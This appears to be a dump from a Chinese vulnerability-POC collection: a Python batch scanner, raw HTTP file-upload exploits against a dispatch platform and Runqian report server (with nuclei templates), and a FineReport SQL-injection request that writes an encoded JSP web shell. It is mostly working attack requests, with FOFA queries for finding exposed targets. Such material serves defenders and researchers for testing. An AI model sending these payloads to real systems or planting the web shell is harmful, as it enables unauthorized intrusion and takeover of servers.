31 | content = response.text
32 |
33 | if "show2" in content:
34 | result = colored(url + " 存在", 'red')
35 |
36 | if output:
37 | with open(output, 'a') as file: # 以追加模式打开文件
38 | file.write(url + '\n')
39 |
40 | print(result) # 即时打印结果
41 | else:
42 | result = url + " 不存在"
43 | print(result) # 即时打印结果
44 |
45 | except requests.exceptions.RequestException as e:
46 | pass # 不进行任何操作,直接请求下一个URL
47 |
48 |
49 | def check_urls_from_file(filename, output=None):
50 | with open(filename, 'r') as file:
51 | url_list = file.read().strip().split('\n')
52 |
53 | for url in url_list:
54 | check_url(url, output)
55 |
56 | # 捕获中断信号
57 | signal.signal(signal.SIGINT, handle_interrupt)
58 |
59 |
60 | def handle_interrupt(signum, frame):
61 | global output_file
62 |
63 | # 在捕获中断时保存当前扫描结果,并关闭文件
64 | if output_file:
65 | output_file.close()
66 |
67 | print("\n扫描已中断并保存当前结果。")
68 | exit()
69 |
70 |
71 | def main():
72 | global output_file
73 |
74 | parser = argparse.ArgumentParser(description='CNVD-2023-12632检测POC')
75 | parser.add_argument('-u', '--url', help='检测单个URL')
76 | parser.add_argument('-r', '--file', help='从文本中批量检测URL')
77 | parser.add_argument('-o', '--output', help='将检测到的输出到文本中')
78 | args = parser.parse_args()
79 |
80 | if args.output:
81 | output_file = open(args.output, 'a') # 以追加模式打开输出文件
82 |
83 | if args.url:
84 | check_url(args.url, args.output)
85 | elif args.file:
86 | check_urls_from_file(args.file, args.output)
87 | else:
88 | parser.print_help()
89 |
90 | # 注册捕获中断信号的处理程序
91 | signal.signal(signal.SIGINT, handle_interrupt)
92 |
93 | # 关闭输出文件
94 | if output_file:
95 | output_file.close()
96 | ```
97 |
98 |
--------------------------------------------------------------------------------
/福建科立讯通信指挥调度管理平台任意文件上传.md:
--------------------------------------------------------------------------------
1 | 利用方式1
2 |
3 | ```
4 |
5 | POST /api/client/fileupload.php HTTP/1.1
6 | Host:
7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
8 | Accept-Encoding: gzip, deflate
9 | Accept: */*
10 | Connection: close
11 | Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
12 | Content-Length: 477
13 |
14 |
15 |
16 | ------WebKitFormBoundaryVBf7Cs8QWsfwC82M
17 | Content-Disposition: form-data; name="file"; filename="rcnlsq.php"
18 | Content-Type: image/jpeg
19 |
20 |
21 |
22 | 5465rcnlsq
23 | ------WebKitFormBoundaryVBf7Cs8QWsfwC82M
24 | Content-Disposition: form-data; name="number";
25 |
26 |
27 |
28 | 5465
29 | ------WebKitFormBoundaryVBf7Cs8QWsfwC82M
30 | Content-Disposition: form-data; name="type";
31 |
32 |
33 |
34 | 1
35 | ------WebKitFormBoundaryVBf7Cs8QWsfwC82M
36 | Content-Disposition: form-data; name="title";
37 |
38 |
39 |
40 | 1
41 | ------WebKitFormBoundaryVBf7Cs8QWsfwC82M--
42 | ```
43 |
44 |
45 |
46 |
47 |
48 | 利用方式2
49 |
50 | ```
51 |
52 | POST /api/client/upload.php HTTP/1.1
53 | Host:
54 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
55 | Accept-Encoding: gzip, deflate
56 | Accept: */*
57 | Connection: close
58 | Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
59 | Content-Length: 194
60 |
61 |
62 |
63 | ------WebKitFormBoundaryVBf7Cs8QWsfwC82M
64 | Content-Disposition: form-data; name="ulfile"; filename="lztkkl.php"
65 | Content-Type: image/jpeg
66 |
67 |
68 |
69 | 99647lztkkl
70 | ------WebKitFormBoundaryVBf7Cs8QWsfwC82M--
71 |
72 |
73 |
74 | GET /upload/lztkkl.php HTTP/1.1
75 | Host:
76 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
77 | Accept-Encoding: gzip, deflate
78 | Accept: */*
79 | Connection: close
80 |
81 | ```
82 |
83 |
84 |
85 |
86 |
87 | 利用方式3
88 |
89 | ```
90 | POST /api/client/task/uploadfile.php HTTP/1.1
91 | Host:
92 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
93 | Accept-Encoding: gzip, deflate
94 | Accept: */*
95 | Connection: close
96 | Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
97 | Content-Length: 198
98 |
99 |
100 |
101 | ------WebKitFormBoundaryVBf7Cs8QWsfwC82M
102 | Content-Disposition: form-data; name="uploadfile"; filename="rvfuid.php"
103 | Content-Type: image/jpeg
104 |
105 |
106 |
107 | 97236rvfuid
108 | ------WebKitFormBoundaryVBf7Cs8QWsfwC82M--
109 |
110 |
111 |
112 | 文件路径:响应包获取
113 | ```
114 |
115 |
116 |
117 | 利用方式4
118 |
119 | ```
120 |
121 | POST /api/client/event/uploadfile.php HTTP/1.1
122 | Host:
123 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
124 | Accept-Encoding: gzip, deflate
125 | Accept: */*
126 | Connection: close
127 | Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
128 | Content-Length: 198
129 |
130 |
131 |
132 | ------WebKitFormBoundaryVBf7Cs8QWsfwC82M
133 | Content-Disposition: form-data; name="uploadfile"; filename="iuctmt.php"
134 | Content-Type: image/jpeg
135 |
136 |
137 |
138 | 48620iuctmt
139 | ------WebKitFormBoundaryVBf7Cs8QWsfwC82M--
140 |
141 |
142 |
143 | 文件地址:响应包获取
144 | ```
145 |
146 |
147 |
148 | 利用方式5
149 |
150 | ```
151 | POST /api/client/upload.php HTTP/1.1
152 | Host:
153 | User-Agent: python-requests/2.31.0
154 | Accept-Encoding: gzip, deflate
155 | Accept: */*
156 | Connection: close
157 | Content-Type: multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaK
158 | Content-Length: 200
159 |
160 |
161 |
162 | ------WebKitFormBoundarymVk33liI64J7GQaK
163 | Content-Disposition: form-data; name="ulfile"; filename="dzfuxvtm.php"
164 | Content-Type: image/jpeg
165 |
166 |
167 |
168 | dzfuxvtm186448
169 | ------WebKitFormBoundarymVk33liI64J7GQaK--
170 |
171 |
172 |
173 | GET /upload/dzfuxvtm.php HTTP/1.1
174 | Host:
175 | User-Agent: python-requests/2.31.0
176 | Accept-Encoding: gzip, deflate
177 | Accept: */*
178 | Connection: close
179 | ```
180 |
181 | FOFA检索:
182 |
183 | ```
184 | body="指挥调度管理平台" && title=="指挥调度管理平台"
185 | ```
--------------------------------------------------------------------------------
/润乾报表dataSphereServlet 任意文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | PosT /servlet/dataSphereServlet?action=38 HTTP/1.1
3 | Host:127.0.0.1
4 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
5 | Accept-Encoding: gzip, deflate
6 | Accept:*/*
7 | Connection: close
8 | Content-Length: 397
9 | Content-Type: multipart/form-data;boundary=eac629ee4641cb0fe10596fba5e0c5d9
10 |
11 | --eac629ee4641cb0fe10596fba5e0c5d9
12 | Content-Disposition: form-data; name="openGrpxFile"; filename="539634.jsp"
13 | Content-Type: text/plain
14 |
15 | <% out.println("873227518"); %>
16 | --eac629ee4641cb0fe10596fba5e0c5d9
17 | Content-Disposition:form-data;name="path"
18 |
19 | ../../../
20 | --eac629ee4641cb0fe10596fba5e0c5d9
21 | Content-Disposition: form-data; name="saveServer"
22 |
23 | 1
24 | -eac629ee4641cb0fe10596fba5e0c5d9-
25 | ```
26 |
27 | 访问地址
28 |
29 | http:*//192.168.31.133:6868/demo/539634.jsp*
30 |
31 |
32 |
33 | nuclei
34 |
35 | ```
36 | id: runqianbaobiaowenjianshangchuan
37 |
38 | info:
39 | name: 润乾报表dataSphereServlet接口存在任意文件上传漏洞
40 | author: 紫色皓月
41 | severity: high
42 | description: 润乾报表dataSphereServlet接口存在任意文件上传漏洞
43 | tags: 2024,润乾报表,任意文件上传
44 |
45 | variables:
46 | file_name: "{{to_lower(rand_text_alpha(8))}}.txt"
47 | file_content: "{{to_lower(rand_text_numeric(32))}}"
48 |
49 | requests:
50 | - raw:
51 | - |
52 | POST /servlet/dataSphereServlet?action=38 HTTP/1.1
53 | Host: {{Hostname}}
54 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
55 | Accept-Encoding: gzip, deflate
56 | Accept: */*
57 | Connection: close
58 | Content-Length: 395
59 | Content-Type: multipart/form-data; boundary=eac629ee4641cb0fe10596fba5e0c5d9
60 |
61 | --eac629ee4641cb0fe10596fba5e0c5d9
62 | Content-Disposition: form-data; name="openGrpxFile"; filename="{{file_name}}"
63 | Content-Type: text/plain
64 |
65 | {{file_content}}
66 | --eac629ee4641cb0fe10596fba5e0c5d9
67 | Content-Disposition: form-data; name="path"
68 |
69 | ../../../
70 | --eac629ee4641cb0fe10596fba5e0c5d9
71 | Content-Disposition: form-data; name="saveServer"
72 |
73 | 1
74 | --eac629ee4641cb0fe10596fba5e0c5d9--
75 |
76 | - |
77 | GET /{{file_name}} HTTP/1.1
78 | Host: {{Hostname}}
79 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
80 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
81 | Accept-Language: en-US,en;q=0.5
82 | Accept-Encoding: gzip, deflate
83 | Connection: close
84 | Upgrade-Insecure-Requests: 1
85 |
86 | req-condition: true
87 | matchers:
88 | - type: word
89 | words:
90 | - "{{file_content}}"
91 | part: body
92 |
93 | ```
94 |
95 |
96 |
97 |
98 |
99 | 新搭建系统存在demo路径,网上查询已搭建好的部分不存在demo路径,poc给出两个方案。
100 |
101 | 存在demo路径POC:
102 |
103 | ```
104 | POST /demo/servlet/dataSphereServlet?action=38 HTTP/1.1
105 | Host: 127.0.0.1
106 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
107 | Accept-Encoding: gzip, deflate
108 | Accept: */*
109 | Connection: close
110 | Content-Length: 392
111 | Content-Type: multipart/form-data; boundary=eac629ee4641cb0fe10596fba5e0c5d9
112 |
113 | --eac629ee4641cb0fe10596fba5e0c5d9
114 | Content-Disposition: form-data; name="openGrpxFile"; filename="539634.jsp"
115 | Content-Type: text/plain
116 |
117 | <% out.println("123456"); %>
118 | --eac629ee4641cb0fe10596fba5e0c5d9
119 | Content-Disposition: form-data; name="path"
120 |
121 | ../../../
122 | --eac629ee4641cb0fe10596fba5e0c5d9
123 | Content-Disposition: form-data; name="saveServer"
124 |
125 | 1
126 | --eac629ee4641cb0fe10596fba5e0c5d9--
127 | ```
128 |
129 | http:*//192.168.31.133:6868/demo/539634.jsp*
130 |
131 | nuclei
132 |
133 | ```
134 | id: runqianbaobiaowenjianshangchuan-DEMO
135 |
136 | info:
137 | name: 润乾报表dataSphereServlet接口存在任意文件上传漏洞
138 | author: 紫色皓月
139 | severity: high
140 | description: 润乾报表dataSphereServlet接口存在任意文件上传漏洞
141 | tags: 2024,润乾报表,任意文件上传,DEMO
142 |
143 | variables:
144 | file_name: "{{to_lower(rand_text_alpha(8))}}.txt"
145 | file_content: "{{to_lower(rand_text_numeric(32))}}"
146 |
147 | requests:
148 | - raw:
149 | - |
150 | POST /demo/servlet/dataSphereServlet?action=38 HTTP/1.1
151 | Host: {{Hostname}}
152 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
153 | Accept-Encoding: gzip, deflate
154 | Accept: */*
155 | Connection: close
156 | Content-Length: 395
157 | Content-Type: multipart/form-data; boundary=eac629ee4641cb0fe10596fba5e0c5d9
158 |
159 | --eac629ee4641cb0fe10596fba5e0c5d9
160 | Content-Disposition: form-data; name="openGrpxFile"; filename="{{file_name}}"
161 | Content-Type: text/plain
162 |
163 | {{file_content}}
164 | --eac629ee4641cb0fe10596fba5e0c5d9
165 | Content-Disposition: form-data; name="path"
166 |
167 | ../../../
168 | --eac629ee4641cb0fe10596fba5e0c5d9
169 | Content-Disposition: form-data; name="saveServer"
170 |
171 | 1
172 | --eac629ee4641cb0fe10596fba5e0c5d9--
173 |
174 | - |
175 | GET /demo/{{file_name}} HTTP/1.1
176 | Host: {{Hostname}}
177 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
178 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
179 | Accept-Language: en-US,en;q=0.5
180 | Accept-Encoding: gzip, deflate
181 | Connection: close
182 | Upgrade-Insecure-Requests: 1
183 |
184 | req-condition: true
185 | matchers:
186 | - type: word
187 | words:
188 | - "{{file_content}}"
189 | part: body
190 | ```
191 |
192 |
--------------------------------------------------------------------------------
/帆软FineReport报表 ReportServer SQL注入getshell.md:
--------------------------------------------------------------------------------
1 | **网络测绘**
2 |
3 | ```
4 | app="帆软-数据决策系统"
5 | ```
6 |
7 | ### 漏洞POc
8 |
9 | ```
10 | GET /webroot/decision/view/ReportServer?test=&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Fuu9iu.jsp%27%20as%20uu9iu%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20uu9iu.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20uu9iu.exp2%28data%29%20VALUES%20%28%27Qax360nb%27%29%3B'),1,1)} HTTP/1.1
11 | ```
12 |
13 |
14 |
15 |
16 |
17 | ```
18 | GET /webroot/decision/view/ReportServer?test=ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss&n=${__fr_locale__=sql('FRDemo',DECODE('%ef%bb%bf%61%74%74%61%63%68%0C%64%61%74%61%62%61%73%65%20%27%2F%68%6F%6D%65%2F%46%44%4C%2F%74%6F%6D%63%61%74%2D%6C%69%6E%75%78%2F%77%65%62%61%70%70%73%2F%77%65%62%72%6F%6F%74%2F%68%65%6C%70%2F%74%31%36%32%36%35%39%34%2E%6A%73%70%27%20%61%73%20%27%74%31%36%32%36%35%39%34%27%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%ef%bb%bf%63%72%65%61%74%65%0C%74%61%62%6C%65%20%74%31%36%32%36%35%39%34%2E%74%74%28%64%61%74%61%7A%20%74%65%78%74%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%ef%bb%bf%49%4E%53%45%52%54%0C%69%6E%74%6F%20%74%31%36%32%36%35%39%34%2E%74%74%28%64%61%74%61%7A%29%20%56%41%4C%55%45%53%20%28%27%3C%25%43%6C%61%73%73%20%73%61%66%65%20%3D%20%43%6C%61%73%73%2E%66%6F%72%4E%61%6D%65%28%22%73%75%6E%2E%6D%69%73%63%2E%55%6E%73%61%66%65%22%29%3B%6A%61%76%61%2E%6C%61%6E%67%2E%72%65%66%6C%65%63%74%2E%46%69%65%6C%64%20%73%61%66%65%43%6F%6E%20%3D%20%73%61%66%65%2E%67%65%74%44%65%63%6C%61%72%65%64%46%69%65%6C%64%28%22%74%68%65%55%6E%22%20%2B%20%22%73%61%66%65%22%29%3B%73%61%66%65%43%6F%6E%2E%73%65%74%41%63%63%65%73%73%69%62%6C%65%28%74%72%75%65%29%3B%73%75%6E%2E%6D%69%73%63%2E%55%6E%73%61%66%65%20%75%6E%53%61%66%65%20%3D%20%28%73%75%6E%2E%6D%69%73%63%2E%55%6E%73%61%66%65%29%20%73%61%66%65%43%6F%6E%2E%67%65%74%28%6E%75%6C%6C%29%3B%62%79%74%65%5B%5D%20%64%61%74%61%42%79%74%65%73%20%3D%20%6A%61%76%61%78%2E%78%6D%6C%2E%62%69%6E%64%2E%44%61%74%61%74%79%70%65%43%6F%6E%76%65%72%74%65%72%2E%70%61%72%73%65%42%61%73%65%36%34%42%69%6E%61%72%79%28%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%64%61%74%61%22%29%29%3B%75%6E%53%61%66%65%2E%64%65%66%69%6E%65%41%6E%6F%6E%79%6D%6F%75%73%43%6C%61%73%73%28%6A%61%76%61%2E%69%6F%2E%46%69%6C%65%2E%63%6C%61%73%73%2C%20%64%61%74%61%42%79%74%65%73%2C%20%6E%75%6C%6C%29%2E%6E%65%77%49%6E%73%74%61%6E%63%65%28%29%3B%25%3E%27%29%3B'),1,1)} HTTP/1.1
19 | host: xxxx
20 | connection: close
21 | content-type: application/x-www-form-urlencoded
22 | accept-encoding: gzip, deflate
23 | accept: */*
24 | ```
25 |
26 | 文件落地webapps/webroot/help/
27 |
--------------------------------------------------------------------------------